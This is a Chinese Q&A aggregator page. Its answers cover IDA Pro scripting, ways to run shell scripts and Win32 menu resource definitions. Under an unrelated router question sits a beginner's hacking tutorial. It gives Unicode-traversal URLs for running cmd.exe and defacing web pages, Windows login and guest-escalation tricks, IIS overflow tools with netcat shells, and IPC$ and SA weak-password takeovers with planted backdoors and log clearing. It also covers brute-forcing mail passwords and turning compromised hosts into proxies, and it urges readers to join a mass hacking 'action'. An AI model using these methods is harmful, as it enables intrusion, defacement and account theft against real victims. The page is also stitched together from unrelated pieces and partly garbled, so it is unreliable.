導航:首頁 > 程序命令 > ida腳本命令報錯

ida腳本命令報錯

發布時間:2022-05-16 23:39:57

❶ IDA Pro權威指南的內容簡介

《IDA Pro權威指南》內容簡介:IDA Pro(互動式反匯編器專業版)是應用最廣泛的靜態反匯編工具,在IT領域有著舉足輕重的地位,但其文檔資料一直都不夠完善。在IDA Pr0創建者Ilfak的協助下問世的這《IDA Pro權威指南》,完美地彌補了這一缺憾。C卜¨1s的理論被業界公認為是權威且令人信服的。而他的模擬器也是公開發布的IDA插件中最棒的一款。
《IDA Pro權威指南》首先描述反匯編理論、逆向工程的基本信息}111DA Pro的背景知識,然後系統地介紹IDA的基本布局和功能、復雜數據結構的處理、交叉引用與繪圖功能,以及如何在非Wiridows平台上運行IDA。書中由淺入深地介紹了IDA的配置、F LlRT技術、IDA類型庫的擴展以及一些IDA限制。難得的是。《IDA Pro權威指南》還探討了IDA的可擴展性。涉及IDA腳本、SDK、插件、載入器模塊和處理器模塊。最後闡述了IDA在逆向工程中的實際用法,討論了各種編譯器的區別、模糊代碼分析和漏洞分析、IDA插件以及IDA調試器。

❷ 如何執行shell腳本其中一條命令

方法一:切換到shell腳本所在的目錄(此時,稱為工作目錄)執行shell腳本:

復制代碼代碼如下:

cd /data/shell

./hello.sh

./的意思是說在當前的工作目錄下執行hello.sh。如果不加上./,bash可能會響應找到不到hello.sh的錯誤信息。因為目前的工作目錄(/data/shell)可能不在執行程序默認的搜索路徑之列,也就是說,不在環境變數PASH的內容之中。查看PATH的內容可用 echo $PASH 命令。現在的/data/shell就不在環境變數PASH中的,所以必須加上./才可執行。

方法二:以絕對路徑的方式去執行bash shell腳本:

復制代碼代碼如下:

/data/shell/hello.sh

方法三:直接使用bash 或sh 來執行bash shell腳本:

復制代碼代碼如下:

cd /data/shell

bash hello.sh



復制代碼代碼如下:

cd /data/shell

sh hello.sh

注意,若是以方法三的方式來執行,那麼,可以不必事先設定shell的執行許可權,甚至都不用寫shell文件中的第一行(指定bash路徑)。因為方法三是將hello.sh作為參數傳給sh(bash)命令來執行的。這時不是hello.sh自己來執行,而是被人家調用執行,所以不要執行許可權。那麼不用指定bash路徑自然也好理解了啊,呵呵……。

方法四:在當前的shell環境中執行bash shell腳本:

復制代碼代碼如下:

cd /data/shell

. hello.sh



復制代碼代碼如下:

cd /data/shell

source hello.sh

前三種方法執行shell腳本時都是在當前shell(稱為父shell)開啟一個子shell環境,此shell腳本就在這個子shell環境中執行。shell腳本執行完後子shell環境隨即關閉,然後又回到父shell中。而方法四則是在當前shell中執行的。

❸ ROS無法使用telnet操作,winbox下想添加腳本scripts的添加按鈕灰色

由於網上很多朋友問我怎麼入侵別人的機器,所以整理了一些我認為容易學的漏洞入侵方法,希望能給初學者一些幫助,下面講的內容很簡單,高手就不用浪費時間看了,:)

(1) UNICODE漏洞入侵
「Uicode漏洞」是微軟IIS的一個重大漏洞。2001年最熱門漏洞之一。
第一步,運行RANGSCAN掃描器,會出現掃描窗口,在最上面有兩個from的橫框,這是讓你填一段IP范圍的。在第一個框里填入啟始域(打個比方,比如你要掃192.168.0.1至192.168.0.255)那麼你在第一個框里就填入192.168.0.1,在to 後面的框里填入192.168.0.255 意思就是掃192.168.0.0至192.168.0.255這段范圍里有UNICODE漏洞的機器。接著在中間有一個添加的橫框,是要填入內容的如:
/scripts/..%c0%af../winnt/system32/cmd.exe
這句話的意思是掃描有 %c0%af 漏洞的機器,對象一般是英文的WIN2000機。
我們把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按「掃描」。就看到RANGSCAN開始掃了。這時就要看你選的IP范圍有漏洞的機器多不多了,如果你選的IP范圍好,呵,很快在掃描結果框里就會顯示掃到的漏洞主機
如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe
意思是192.168.0.111主機有 %c0%af 漏洞,
目標有了,我們馬上打開瀏覽器。在網址欄里輸入:
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回車
意思是查看機器里C盤的根目錄。一般情況下,我們都可以在瀏覽器里看到類似如:
Directory of c:\
2002-03-13 03:47p 289 default.asp
2002-02-11 03:47p 289 default.htm
2002-03-09 04:35p <DIR> Documents and Settings
2002-02-11 03:47p 289 index.asp
2002-02-11 03:47p 289 index.htm
2002-05-08 05:19a <DIR> Inetpub
2002-01-19 10:37p <DIR> MSSQL7
2002-03-09 04:22p <DIR> Program Files
2002-01-23 06:21p <DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,568 bytes free
------------------------------
的目錄列表。也會碰到看不到文件的空目錄。
好,我們成功看到了機器里的C盤了。
我們在瀏覽器里輸入:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回車
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=192.168.0.111
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=192.168.0.111
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa
-----------------
哈,我們看到了機器設置內容了,我們找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot
意思是他的主頁存放在c:\inetpub\wwwroot的目錄里,知道就好辦了。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回車
我們就可以看到c:\inetpub\wwwroot目錄里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我們以目錄里有index.asp做例子。
我們先要做的是把文件的只讀屬性解除掉,很多管理員都把文件設置只讀。
我們用命令:
192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回車
當看到下面的英文
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
恭喜你,你可以改他的網頁了。
----------------------------------------
但如果你看到下面的英文就不成功,只好換其他機器了。
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access denied - C:\inetpub\wwwroot\index.asp
-----------------------------
繼續。現在用ECHO改網頁的內容。
100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+網站有漏洞+> c:\inetpub\wwwroot\index.asp 回車
當看到
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
的提示,你已經改了他的網頁了,呵呵,你想改成什麼字也行。只要把命令中的中文換成你自己的中文就行了。

英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
中文WIN2000
/scripts/..%c0%2f../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe
WIN NT4
/scripts/..%c1%9c../winnt/system32/cmd.exe
英文WIN2000
/scripts/..%c0%af../winnt/system32/cmd.exe
通用代碼:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000輸入法漏洞
先用埠掃描器掃描開放3389的機器,然後用終端客戶端程序進行連接,用CTRL+SHIFT快速切換輸入法,切換至全拼,這時在登錄界面左下角將出現輸入法狀態條,在輸入法狀態條上按滑鼠右鍵。選擇「幫助」 —— 「輸入法指南」 —— 「選項」。(如果發現「幫助」呈灰色,放棄,因為對方很可能發現並已經補上了這個漏洞。)按右鍵,選擇「跳轉到URL」,輸入:c:\winnt\system32在該目錄下找到「net.exe」,為「net.exe」創建一個快捷方式,右鍵點擊該快捷方式,在「屬性」 —「目標」—c:\winnt\system32\net.exe 後面空一格,填入「user guest /active :yes」。 點擊「確定」(目的是,利用「net.exe」激活被禁止使用的guest賬戶)運行該快捷方式。(此時你不會看到運行狀態,但guest用戶已被激活。)然後重復操作上面的,在 「屬性」 —— 「目標」—— c:\winnt\system32\net.exe 後面空一格,填入localgroup administrators guest /add(這一步驟目的是,利用「net.exe」將guest變成系統管理員。)再次登錄終端伺服器,以「guest」身份進入,此時guest已是系統管理員,已具備一切可執行權及一切操作許可權。現在,我們可以像操作本地主機一樣,控制對方系統。
(3) idq溢出漏洞
要用到3個程序,一個Snake IIS IDQ 溢出程序GUI版本,一個掃描器,還有NC。
首先掃描一台有IDQ漏洞的機器,然後設置Snake IIS IDQ 溢出程序,在被攻擊IP地址後面寫上對方的IP.埠號一般不需要改動,軟體的默認綁定CMD.EXE的埠是813.不改了.用默認的,左面選擇操作系統類型,隨便選一個,我們選IIS5 English Win2k Sp0吧,點擊IDQ溢出~~OK~~出現發送Shellcode成功的提示了,然後我們用NC來連接。
進入MS-DOS。進入「nc」的目錄。然後:nc --v IP 813
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:\>

看來沒成功. 別灰心,在來一次,換用IIS5 English Win2k Sp1試試。
c:\>nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
哈哈,終於上來啦,你現在可是system許可權,下面該怎麼做就看你的啦。

(4)IDA溢出漏洞
所用程序:idahack
進入MS-DOS方式(假設idq.exe在c:\下)
c:\idahack.exe
運行參數:c:\idahack <host> <hostport> <hosttype> <shellport>
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
好 luck 
好,現在你可以telnet它的80埠了,我們用NC來連接。
C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]
(C)版權所有 1985-1998 Microsoft Corp
C:\WINNT\system32>
OK,現在我們現在上來了,也可IDQ一樣是SYSTEN許可權,盡情的玩吧。

(5).printer漏洞
這個漏洞,我們用兩個程序來入侵。iis5hack和nc。
C:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE <Host> <HostPort> <HostType> <ShellPort>
用法: D:\IIS5HACK <溢出的主機> <主機的埠> <主機的類型> <溢出的埠>
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9

c:\>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
好 luck

溢出成功!
c:\>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>

OK,我們又成功取得system許可權!玩吧。

(6)139埠入侵
我們先確定一台存在139埠漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個埠掃描工具。假設現在我們已經得到一台存在139埠漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數介紹:?
<1>鍵入不帶參數的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數介紹:?
鍵入不帶參數的net use列出網路連接。?
devicename指定要連接到的資源名稱或要斷開的設備名稱。?
\\computername\sharename伺服器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網路連接。?
/persistent控制永久網路連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現在我們已經得到的139埠漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這台電腦了!雙擊就可以進入,其使用的方法和網上領居的一樣。

(7)IPC入侵
所有程序:流光
開始:在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。輸入我們要破解的IP段,我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機。在「輔助主機」那裡的「IPC$主機」前面打勾,然後在菜單了選「探測」,,掃描出結果以後,「IPC$主機」,選中後按「CTRL+F9」就開始探測IPC用戶列表。會出現「IPC自動探測」
的窗體,把那兩個選項都選了,然後點「選項」 為了加快弱口令掃描速度,這里的兩個選項我們可以全部取消記住。然後點「確定」出來後點「是」就開始探測了。一會兒,結果出來了。比如我們探測出了用戶名為「admin」的管理員,密碼為「admin」,現在我們用命令提示符,熟悉下命令吧,輸入:
net use file://對方ip/ipc$ "密碼" /user:"用戶名" || 建立遠程連接
icmd.exe file://對方ip/admin$ || admin$是對方的winnt目錄
net time file://對方IP/ || 看看對方的本地時間
at file://對方ip/ 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序
telnet 對方ip 埠

我們也可以改網頁:
net use \\ip\ipc$ "admin" /uesr:"admin" 回車。
出現「命令成功完成」。
然後輸入「dir \\ip\c$\*.*」
看到C:下所有內容。現在我們來改主頁。一般主頁放在c:\inetpub\wwwroot裡面
輸入「dir \\ip\c$\inetpub\wwwroot\*.*」。就可以看到index.htm或index.asp或default.htm或 default.asp.這些就是主頁了,假如你黑頁在C:下,就輸入" 主頁文件 \\ip\c$\inetpub\wwwroot"覆蓋原文件這樣就行了,簡單吧?

日誌清除,斷開連接 :
我們 cl.exe ,clear.exe 上去,再執行,就可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use file://ip/ipc$ /delete

(8)超管SA空密碼漏洞
使用的工具:流光IV
啟動流光,按Ctrl+R。出現掃描設置對話框,設置掃描IP段,並且選擇掃描的類型為SQL。點擊「確定」,進行掃描,假設我們取得主機:127.0.0.1,然後點擊「工具」 —— SQL遠程命令(或者Ctrl+Q),填入主機IP(127.0.0.1)、用戶(sa)、密碼(空)點擊「連接」,出現遠程命令行的界面。
net user heiying heiying1 /add 填加一個heiying的帳號和密碼heiying1
net localgroup administrators heiying /add 將我們創建的heiying帳號填加到管理組。
下面我們來做跳板:
打開cmd.exe,輸入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
顯示命令成功完成。
上傳srv.exe:
srv.exe \\127.0.0.1\admin$\system32
上傳ntlm.exe:
ntlm.exe \\127.0.0.1\admin$\system32
啟動服務:
首先用net time \\127.0.0.1
看看對方主機的時間,(假如回顯\\127.0.0.1 的本地時間是上午12.00),然後我們用at \\2127.0.0.1 12.01 srv.exe命令來啟動srv.exe。等一分鍾後就可以telnet了。
一分鍾後在本機命令提示符中輸入:
telnet X.X.X.X 99
然後我們要啟動NTLM.exe:
在telnet狀態下直接輸入ntlm回車。
顯示:windows 2000 telnet mp,by assassin,all rights reserved.done!
然後從新啟動對方主機的telnet服務:net stop telnet(先關閉telnet服務)再輸入net start telnet(啟動telnet服務)然後我們退出telnet,然後在命令行下輸入telnet 127.0.0.1,依照提示,接著輸入用戶名:heiying,密碼:heiying1,回車。這樣,我們的跳板就做好了,簡單吧?
(上面上傳的srv和ntlm等東東還有一個簡便方法,全都可以直接用流光工具菜單里的種植者上傳,60秒後自動運行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密碼
這次的目標是21CN,運行流光IV,選擇POP3主機----右鍵----編輯----添加,填上:pop.21cn.com,其他的就用默認吧!不用更改,確定就行了。到下一步,還是右鍵-----從列表中添加------選擇一個字典,沒有的到網上下載一個字典,或者到黑白網路去下載,我們用簡單模式探測!這樣速度比較快,然後就等著成果吧,上次我以下就破了5個郵箱出來。

(10)frontpage進行攻擊
打開您自己的Frontpage,文件菜單下選擇「打開站點」,然後在文件夾框里寫入http://127.0.0.1(http://不要漏掉)。按下「打開」按鈕,一會後,出現了文件夾,成功了,現在就可以操作網頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來後就還可以改網頁。這個只能改該網頁,沒什麼玩的。

(11)用肉雞做SOCK5代理跳板
需要軟體:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我們在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後,我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後,
看肉雞上現在的時間:
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09:00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01後。我們來連接肉雞:
c:\telnet 127.0.0.1 99
連上後顯示:
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務:
C:\WINNT\system32>net stop telnet
繼續:
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK,我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切順利,我們現在正式開始做代理:
c:>sss.exe -install <---------開始安裝
顯示:
c:>sksockserver installed!
來看看配置:
c:>sss -config show
顯示:
SkServer Port = 1813 <----開放服務的埠 ,我們記著這個1813埠哦
SkServer StartType: 3 - Manual <---服務啟動方式
SkServer Enable Client Set Num:0 <---客戶端的項目個數
SkServer Pass SkServer Number:0 <---經過SkServer的項目個數

來啟動服務:
c:>net start skserver
提示你正在啟動,並且完成。
來檢查一下是不是啟動了:
c:>net start <-----------看看啟動的服務列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了,到這里我們已經做好了一個socks5代理了,我們自己的哦.OK,下面我們用sockscap來使用我們做代理。
安裝好SocksCap後,我們在桌面上打開SocksCap V2,點開File選項選Settings...彈出卡片,在 SOCKS Server裡面我們填肉雞的IP:127.0.0.1,PortT填默認的1813埠,下面的我們選socks version 5,呵呵,和 Attempt local then remot,這是域名解析的順序,先本地,然後才遠程。設置完了點「確定」我們就可以使用了,添加應用程序到sockscap裡面,點開那個"new"按鈕,會彈出一個卡片,
Profile name :程序名,隨便寫。
Command Line: 命令行,點後面的Browse...找到你的程序路徑
Working:填好上面那個,這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用,也可以選住程序在點"Run"來運行。

好了,終於寫完了,上面的內容都很簡單,很適合初學者,還望高手們不好見笑,剛好聽說這次5.1有很多聯盟有所行動,希望上面的內容能教會一部分人,少走彎路,讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠,還差很遠,所以還不敢寫。

❹ 怎麼列印 ida的gdb 命令

GDB是一個強大的命令行調試工具。雖然X Window提供了GDB的圖形版DDD,但是我仍然更鍾愛在命令行模式下使用GDB。大家知道命令行的強大就是在於,其可以形成執行序列,形成腳本。UNIX下的軟體全是命令行的,這給程序開發提代供了極大的便利

❺ 誰能幫我寫個ida腳本實現把指令var

你的意思是這樣的?
_text:01007487 lea eax, [ebp+var_2C]
_text:0100748A push eax
_text:0100748B lea eax, [ebp+var_30]
_text:0100748E push eax
_text:0100748F lea eax, [ebp+var_34]

----->>>>>
_text:01007487 lea eax, [ebp-2Ch]
_text:0100748A push eax
_text:0100748B lea eax, [ebp-30h]
_text:0100748E push eax
_text:0100748F lea eax, [ebp-34h]

idapython寫的比較拙。。

代碼:

from idautils import *
ea = ScreenEA()
address_start = SegStart(ea)
address_end = SegEnd(ea)
i = address_start
while 1:
if i<address_end:
OpHex(i,-1)
print "%X" % i
i = i+1
else:
break

❻ 加速鍵是不是Windows應用程序的資源.

加速鍵

主菜單,頂層菜單,彈出式菜單,子菜單,右鍵彈出式菜單,系統彈出式菜單。菜單中的菜單項有好幾種,從資源定義的角度來看,分隔用的橫線也是一個菜單項,除橫線外其他菜單項可以供用戶選擇,也可以設置為「禁止」或「灰化」狀態暫時停用。

菜單項上的圓點表示選中標記是互斥的,對鉤表示是不互斥的。

加速鍵就是菜單項的快捷鍵。表示當窗口是激活的時候,不必打開菜單,直接按快捷鍵就相當於選擇了菜單項。

菜單和加速鍵的資源定義

資源腳本文件舉例:

[plain] view plain
//Menu.rc

#include <resource.h>

#define ICO_MAIN 0x1000 //圖標

#define IDM_MAIN 0x2000 //菜單

#define IDA_MAIN 0x2000 //加速鍵

#define IDM_OPEN 0x4101

#define IDM_OPTION 0x

#define IDM_EXIT 0x4103

#define IDM_SETFONT 0x4201

#define IDM_SETCOLOR 0x4202

#define IDM_INACT 0x4203

#define IDM_GRAY 0x4204

#define IDM_BIG 0x4205

#define IDM_SMALL 0x4206

#define IDM_LIST 0x4207

#define IDM_DETALL 0x4208

#define IDM_TOOLBAR 0x4209

#define IDM_TOOLBARTEXT 0x4210

#define IDM_INPUTBAR 0x4211

#define IDM_STATUSBAR 0x4212

#define IDM_HELP 0x4301

#define IDM_ABOUT 0x4302

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

ICO_MAIN ICON 「Main.ico」

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

IDM_MAIN menu discardable

BEGIN

popup 「文件(&F)」

BEGIN

menuitem 「打開文件(&O)…」, IDM_OPEN

menuitem 「關閉文件(&C)…」, IDM_OPTION

menuitem separator

menuitem 「退出(&X)」, IDM_EXIT

END

popup 「查看(&V)」

BEGIN

menuitem 「字體(&F)…\tAlt+F」, IDM_SETFONT

menuitem 「背景色(&B) …\tCtrl+Alt+B」, IDM_SETCOLOR

menuitem separator

menuitem 「被禁用的菜單項」, IDM_INACT, INACTIVE

menuitem 「被灰化的菜單項」, IDM_GRAY, GRAYED

menuitem separator

menuitem 「大圖標(&G)」, IDM_BIG

menuitem 「小圖標(&M)」, IDM_SMALL

menuitem 「列表(&L)」, IDM_LIST

menuitem 「詳細資料(&D)」, IDM_DETAIL

menuitem separator

menuitem 「工具欄(&T)」

BEGIN

menuitem 「標准按鈕(&S)」, IDM_TOOLBAR

menuitem 「文字標簽(&C)」, IDM_TOOLBARTEXT

menuitem 「命令欄(&I)」, IDM_INPUTBAR

END

menuitem 「狀態欄(&U)」, IDM_STATUSBAR

END

popup 「幫助(&H)」 HELP

BEGIN

menuitem 「幫助主題(&H)\F1」, IDM_HELP

menuitem separator

menuitem 「關於本程序(&A)…」, IDM_ABOUT

END

END

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

IDA_MAIN accelerators

BEGIN

VK_F1, IDM_HELP, VIRTKEY

「B」, IDM_SETCOLOR, VIRTKEY, CONTROL, ALT

「F」, IDM_SETFONT, VIRTKEY, ALT

END

//編譯上述文件使用的makefile文件如下:

NAME = Menu

OBJS = $(NAME).obj

RES = $(NAME).res

LINK_FLAG = /subsystem:windows

ML_FLAG = /c /coff

$(NAME).exe: $(OBJ) $(RES)

Link $(LINK_FLAG) $(OBJS) $(RES)

.asm .obj:

ml $(ML_FLAG) $<

.rc .res:

rc $<

clean:

del *.obj

del *.res

為了編譯資源文件,makefile中多了一個資源編譯的隱含規則:

.rc .res:

rc $<

同時在exe文件的依賴文件中增加了Menu.res文件。

在rc文件中,各種語句使用的是C語言語法格式,因為資源編譯器Rc.exe根本上就是Visual C++附帶的,所以在定義等值語句的時候用的是#define,包含語句使用#include<文件名>,用到16進制數值的時候並不是用匯編的語法在後面加h,而是用前面加0x的方法,如1234h寫為0x1234,注釋也要用前面加//的方法。

在腳本文件的頭部,首先要把MASM32軟體包中的resource.h文件包含進來,這個文件中包括了資源定義中很多的預定義值,如窗口屬性與加速鍵的鍵值等。資源在程序中的引用往往用一個數值來表示,稱為資源的ID值,但在定義的時候直接使用數值不是很直觀,所以往往用#define語句將數值定義為容易記憶的字元串。

菜單的定義

在資源腳本文件中菜單的定義格式是:

菜單ID MENU [DISCARDABLE]

BEGIN

菜單項定義



END

「菜單ID MENU [DISCARDABLE]」語句用來指定菜單的ID值和內存屬性,菜單ID可以是16位的整數,范圍是1~65535,在Menu.rc文件中,定義的菜單ID是2000h,但菜單ID也可以字元串表示,如下面的定義:

MainMenu menu

begin

menuitem…

end

表示菜單的ID是字元串型的「MainMenu」,但這樣定義的話,在程序中引用的時候就要用字元串指針代替16進制的菜單ID值,顯得相當不便,所以在實際應用中通常使用16進制數值當做菜單ID。

數值型ID的范圍限制在1~65535之間的原因是字元串在內存中的線性地址總是大於10000h,API函數檢測參數時發現小於10000h時就可以把它認為是數值型的,大於10000h時就當做字元串指針處理。

menu關鍵字後面的DISCARDABLE是菜單的內存屬性,表示菜單在不再使用的時候可以暫時從內存中釋放以節省內存,這是一個可選屬性。菜單項的定義語句必須包含在begin和end關鍵字之內,這兩個關鍵字也可以用花括弧{和}代替。

菜單項目的定義方法有3類:

MENUITEM 菜單文字,命令ID[,選項列表] (用法1)

或 MENUITEM SEPARATOR (用法2)

或 POPUP 菜單文字[,選項列表] (用法3)

BEGIN

item-definitions



END

用法1定義的是普通菜單項。

組成部分有:

菜單文字——顯示在菜單項中的字元串。如果需要字元串中某個字母帶下橫線,那麼可以在字母前面加&符號,帶下橫線的字母可以被系統自動當做快捷鍵。另外,如果要把加速鍵的提示信息顯示在菜單項的右邊,如「字體」菜單項中的「Alt+F」字元,可以在兩者中間加\t,表示插入一個Tab字元),寫為「字體(&F)…\tAlt+F」,這樣Tab後面的字元在顯示的時候會右對齊。

命令ID——用來分辨不同的菜單項,當菜單項被選中的時候,Windows會向窗口過程發送WM_COMMAND消息,消息的參數就是這個命令ID。用命令ID可以分辨用戶究竟選中了哪個菜單項,所以不同的菜單項應該定義不同的ID值,除非想讓兩個菜單項的功能相同。

選項——用來定義菜單項的各種屬性,它可以是下列數值:

CHECKED——表示打上選定標志(對鉤)。

GRAYED——表示菜單項是灰化的。

INACTIVE——表示菜單是禁用的。

MENUBREAK或MENUBARBREAK——表示將這個菜單項和以後的菜單項列到新的列中。

用法2定義的是菜單項之間的分隔線,顯然,分隔線是不需要字元串和選項的。

用法3定義的是彈出式菜單,頂層菜單是由多個彈出式子菜單組成的,所以在Menu.rc文件中,主菜單是由「文件」、「查看」、「幫助」3個順序定義的彈出式菜單組成的,彈出式菜單的定義也可以嵌套,如「查看」菜單中的「工具欄」又是一個彈出式菜單,在嵌套的時候要注意像寫C的源程序一樣把begin和end(或者{或})正確地配對。popup菜單的選項列表可以是以下的值:

GRAYED——表示菜單項是灰化的。

INACTIVE——表示菜單項是禁用的。

HELP——表示本項和以後的菜單項是右對齊的。

popup菜單項選中的時候會自動將彈出式菜單彈出來,不需要向程序發送消息,所以在定義的參數中不需要命令ID。

有些選項是可以同時定義,如果要指定超過一個的選項,中間要用逗號隔開,但是也有些小小的限制:GRAYED和INACTIVE不能同時使用,MENUBREAK和MENUBARBREAK也是不能同時使用的。

加速鍵的定義

和菜單的定義相比,加速鍵的定義要簡單得多,具體的語法如下:

加速鍵ID ACCELERATORS

BEGIN

鍵名,命令ID [,類型] [,選項]



END

加速鍵ID同樣可以是一個字元串或者是1~65535之間的數字,整個定義內容也是用begin和end(或花括弧)包含起來,中間是多個加速鍵的定義項目,每個鍵占據一行,各欄位的含義如下所示。

鍵名——表示加速鍵對應的按鈕,可以有3種方式定義:

「^字母」:表示Ctrl鍵加上字母鍵。

「字母」:表示字母,這時類型必須指明是VIRTKEY。

數值:表示ASCII碼為該數值的字母,這時類型必須指明為ASCII。

